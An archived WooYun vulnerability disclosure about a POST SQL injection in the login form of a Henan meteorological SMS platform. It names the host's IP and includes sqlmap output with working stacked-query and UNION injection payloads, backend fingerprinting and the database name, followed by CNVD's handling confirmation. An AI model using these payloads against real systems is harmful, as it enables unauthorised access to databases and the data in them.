乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-18: 细节已通知厂商并且等待厂商处理中 2015-03-23: 厂商已经确认,细节仅向厂商公开 2015-04-02: 细节向核心白帽子及相关领域专家公开 2015-04-12: 细节向普通白帽子公开 2015-04-22: 细节向实习白帽子公开 2015-05-07: 细节向公众公开
rt
河南气象短信录入平台v2.0http://218.28.29.35:9001/default.asp登录框存在post注入
sqlmap identified the following injection points with a total of 81 HTTP(s) requests:---Parameter: UserID (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: UserID=admin';WAITFOR DELAY '0:0:5'--&Password=admin&Submit= %B5%C7 %C2%BC Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: UserID=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113) CHAR(120) CHAR(107) CHAR(113) CHAR(113) CHAR(83) CHAR(108) CHAR(97) CHAR(118) CHAR(82) CHAR(89) CHAR(75) CHAR(117) CHAR(105) CHAR(107) CHAR(113) CHAR(112) CHAR(112) CHAR(120) CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &Password=admin&Submit= %B5%C7 %C2%BC ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: UserID (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: UserID=admin';WAITFOR DELAY '0:0:5'--&Password=admin&Submit= %B5%C7 %C2%BC Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: UserID=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113) CHAR(120) CHAR(107) CHAR(113) CHAR(113) CHAR(83) CHAR(108) CHAR(97) CHAR(118) CHAR(82) CHAR(89) CHAR(75) CHAR(117) CHAR(105) CHAR(107) CHAR(113) CHAR(112) CHAR(112) CHAR(120) CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL-- &Password=admin&Submit= %B5%C7 %C2%BC ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008current database: 'SMSMAIN'
过滤
危害等级:中
漏洞Rank:8
确认时间:2015-03-23 10:39
CNVD确认所述情况,已经转由CNCERT下发给分中心,由其后续协调网站管理单位处置。
暂无